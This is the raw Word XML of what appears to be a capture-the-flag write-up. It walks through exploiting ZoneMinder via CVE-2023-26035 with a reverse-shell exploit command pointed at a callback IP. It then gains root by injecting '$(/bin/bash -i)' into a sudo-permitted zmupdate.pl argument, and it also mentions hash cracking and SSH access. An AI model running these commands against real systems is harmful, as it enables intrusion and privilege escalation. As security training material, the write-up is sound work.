            <wp:docPr id="182068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9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3FF" w14:textId="77777777" w:rsidR="00D1028F" w:rsidRDefault="00D1028F" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E2131F" w14:textId="53B8606C" w:rsidR="00D1028F" w:rsidRDefault="00D1028F" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1028F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6357E147" wp14:editId="5C68BDD5">
            <wp:extent cx="5943600" cy="3110865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5320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7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31A" w14:textId="77777777" w:rsidR="00D95E33" w:rsidRDefault="00D95E33" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D3B3F8" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EAAA01" w14:textId="2325A07F" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>In the meanwhile, I found the solution for this challenge. Great jobs!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC74092" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRPr="003C2D9E" w:rsidRDefault="00CE0F9A" w:rsidP="00CE0F9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2023-26035</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038FBFE1" w14:textId="2F817FBD" w:rsidR="003C2D9E" w:rsidRDefault="00000000" w:rsidP="00CE0F9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="003C2D9E" w:rsidRPr="000A1C19">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/rvizx/CVE-2023-26035</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0136214C" w14:textId="77777777" w:rsidR="003C2D9E" w:rsidRDefault="003C2D9E" w:rsidP="00CE0F9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA5A395" w14:textId="4FBCB195" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="00CE0F9A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>python3 exploit.py -t http://localhost:8080/ -ip 10.10.14.142 -p 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F73C18" w14:textId="68ABF534" w:rsidR="00D95E33" w:rsidRDefault="00D95E33" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00D95E33">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E15B8CF" wp14:editId="4DCC0DC8">
            <wp:extent cx="5943600" cy="2574290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102982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20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1EFC" w14:textId="77777777" w:rsidR="00F76D55" w:rsidRDefault="00F76D55" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F6A41B0" w14:textId="1135FF23" w:rsidR="00F76D55" w:rsidRDefault="00F76D55" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00F76D55">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F89A8F8" wp14:editId="272BEC1E">
            <wp:extent cx="5943600" cy="1576070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="204254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49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3C15" w14:textId="77777777" w:rsidR="00483666" w:rsidRDefault="00483666" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D566907" w14:textId="531C49C6" w:rsidR="00483666" w:rsidRDefault="00483666" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00483666">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4720F2" wp14:editId="584F3588">
            <wp:extent cx="5943600" cy="1624965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="214008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844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614" w14:textId="2E89A876" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now using payload and netcat, we have a reverse shell of the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>zoneminder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55646233" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651B632A" w14:textId="5ABF9C51" w:rsidR="00E163F3" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Try to see if the user can do anything useful with </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35F2DF" w14:textId="77777777" w:rsidR="00355674" w:rsidRDefault="00E163F3" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00E163F3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D3A7875" wp14:editId="7E617129">
            <wp:extent cx="5943600" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="127685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03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711A" w14:textId="1EA82043" w:rsidR="000E0E8D" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It seems that he/she can execute all the file with the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>extension .pl and start with zm in /usr/bin</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5335537A" w14:textId="69A007CA" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>The most intriguing part is here, after looking around in the Internet, I found the the zmupdate.pl is the one we can use to execute malicious code in order to get the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7BF24" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A049DE" w14:textId="63286BD0" w:rsidR="00CE0F9A" w:rsidRDefault="00000000" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00CE0F9A" w:rsidRPr="000A1C19">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sgzoneminder.readthedocs.io/en/latest/userguide/components.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5610DD69" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669C0FE3" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697CE5B2" w14:textId="77777777" w:rsidR="00CE0F9A" w:rsidRDefault="00CE0F9A" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE8ABCF" w14:textId="77777777" w:rsidR="001D7FFB" w:rsidRDefault="001D7FFB" w:rsidP="001D7FFB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So I try </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF650B9" w14:textId="5814181D" w:rsidR="00CE0F9A" w:rsidRDefault="001D7FFB" w:rsidP="001D7FFB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>sudo /usr/bin/zmupdate.pl --version=1 --user='$(/bin/bash -i)' --pass=ZoneMinderPassword2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5FBC1F" w14:textId="7784C13E" w:rsidR="000E0E8D" w:rsidRDefault="000E0E8D" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="000E0E8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="437F0FE0" wp14:editId="600A759F">
            <wp:extent cx="5943600" cy="2802890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19300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81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2ACD" w14:textId="1416EDFE" w:rsidR="00FC625C" w:rsidRDefault="00FC625C" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>finally</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we have the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but it seems invisible. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Weird ???</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D796AB9" w14:textId="1E751C10" w:rsidR="00330E5C" w:rsidRDefault="00330E5C" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00330E5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DC254A7" wp14:editId="12E1DC81">
            <wp:extent cx="5943600" cy="285115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="148651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34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C94D" w14:textId="5EE205C5" w:rsidR="00355674" w:rsidRDefault="00FC625C" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I just tried to send it to my local host and …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F62A1" w14:textId="2A26D647" w:rsidR="00E163F3" w:rsidRDefault="00355674" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="00355674">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EF733C4" wp14:editId="2E71D636">
            <wp:extent cx="5943600" cy="1932305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75899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930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06">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E52FB3" w14:textId="1730FC5D" w:rsidR="00FC625C" w:rsidRDefault="00FC625C" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ALL THING </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C2D9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DONE !!!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1BC722EF" w14:textId="77777777" w:rsidR="00531FCD" w:rsidRDefault="00531FCD" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A037E05" w14:textId="77777777" w:rsidR="00D27690" w:rsidRDefault="00D27690" w:rsidP="00D2769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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53065936" w14:textId="7D8D6D31" w:rsidR="00D27690" w:rsidRDefault="00D27690" w:rsidP="00D27690">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidR="001134F0" w:rsidRPr="001134F0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CVE-2023-41892</w:t>
      </w:r>
      <w:r w:rsidR="001134F0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>get the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35994CD3" w14:textId="0916D257" w:rsidR="00D27690" w:rsidRDefault="00D159CB" w:rsidP="00D27690">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Try looking around the environment</w:t>
      </w:r>
      <w:r w:rsidR="00D27690">
        <w:t xml:space="preserve"> =&gt; password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash for Matthew user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B1DB7" w14:textId="4E520D37" w:rsidR="00D159CB" w:rsidRDefault="00D159CB" w:rsidP="00D27690">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Crack it with the John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55251D2F" w14:textId="77777777" w:rsidR="00D27690" w:rsidRDefault="00D27690" w:rsidP="00D27690">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connect to the system through ssh =&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C66839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD6872" w14:textId="534AAA03" w:rsidR="00D27690" w:rsidRDefault="00D27690" w:rsidP="00D27690">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get the </w:t>
      </w:r>
      <w:r w:rsidR="00D159CB">
        <w:t>zoneminder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> version and find the vulnerabilities =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00D159CB" w:rsidRPr="00D159CB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CVE-2023-26035</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42576995" w14:textId="05DAD6BA" w:rsidR="00D27690" w:rsidRPr="00984DB7" w:rsidRDefault="00D159CB" w:rsidP="00D159CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit the zmupdate.pl</w:t>
      </w:r>
      <w:r w:rsidR="00D27690">
        <w:t xml:space="preserve"> and get the root privilege =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00D27690" w:rsidRPr="00C66839">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B856A6" w14:textId="77777777" w:rsidR="00531FCD" w:rsidRPr="003C2D9E" w:rsidRDefault="00531FCD" w:rsidP="000C1FCF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D27689D" w14:textId="77777777" w:rsidR="000C1FCF" w:rsidRDefault="000C1FCF"/>
    <w:sectPr w:rsidR="000C1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23274"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57221102"/>
    <w:lvl w:ilvl="0" w:tplc="7D7213A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FA1ADE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F66E9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67E46"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F66E9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99789">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1854343616">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1624114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7E"/>
    <w:rsid w:val="000C1FCF"/>
    <w:rsid w:val="000E0E8D"/>
    <w:rsid w:val="001134F0"/>
    <w:rsid w:val="001C62FC"/>
    <w:rsid w:val="001D7FFB"/>
    <w:rsid w:val="00203923"/>
    <w:rsid w:val="00330E5C"/>
    <w:rsid w:val="00332768"/>
    <w:rsid w:val="0034186C"/>
    <w:rsid w:val="00355674"/>
    <w:rsid w:val="00364B42"/>
    <w:rsid w:val="003C2D9E"/>
    <w:rsid w:val="003D21D1"/>
    <w:rsid w:val="00480B9D"/>
    <w:rsid w:val="00483666"/>
    <w:rsid w:val="00531FCD"/>
    <w:rsid w:val="007002E1"/>
    <w:rsid w:val="00753B51"/>
    <w:rsid w:val="00795E06"/>
    <w:rsid w:val="009D32FB"/>
    <w:rsid w:val="00A42146"/>
    <w:rsid w:val="00A76E36"/>
    <w:rsid w:val="00AD6502"/>
    <w:rsid w:val="00B234A5"/>
    <w:rsid w:val="00BC5A5C"/>
    <w:rsid w:val="00BE287E"/>
    <w:rsid w:val="00CE0F9A"/>
    <w:rsid w:val="00D1028F"/>
    <w:rsid w:val="00D159CB"/>
    <w:rsid w:val="00D27690"/>
    <w:rsid w:val="00D559F8"/>
    <w:rsid w:val="00D603A8"/>
    <w:rsid w:val="00D95E33"/>
    <w:rsid w:val="00DC50A3"/>
    <w:rsid w:val="00E163F3"/>
    <w:rsid w:val="00E75A88"/>
    <w:rsid w:val="00E85DAF"/>
    <w:rsid w:val="00EA6132"/>
    <w:rsid w:val="00F76D55"/>
    <w:rsid w:val="00FC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C05CB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9C032CE1-1776-45EC-95CF-70580E7A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0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2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1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0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4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rvizx/CVE-2023-26035" TargetMode="Externa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hyperlink" Target="https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226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sgzoneminder.readthedocs.io/en/latest/userguide/components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12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Minh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyen Hoang Minh</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-30T16:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-02T15:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>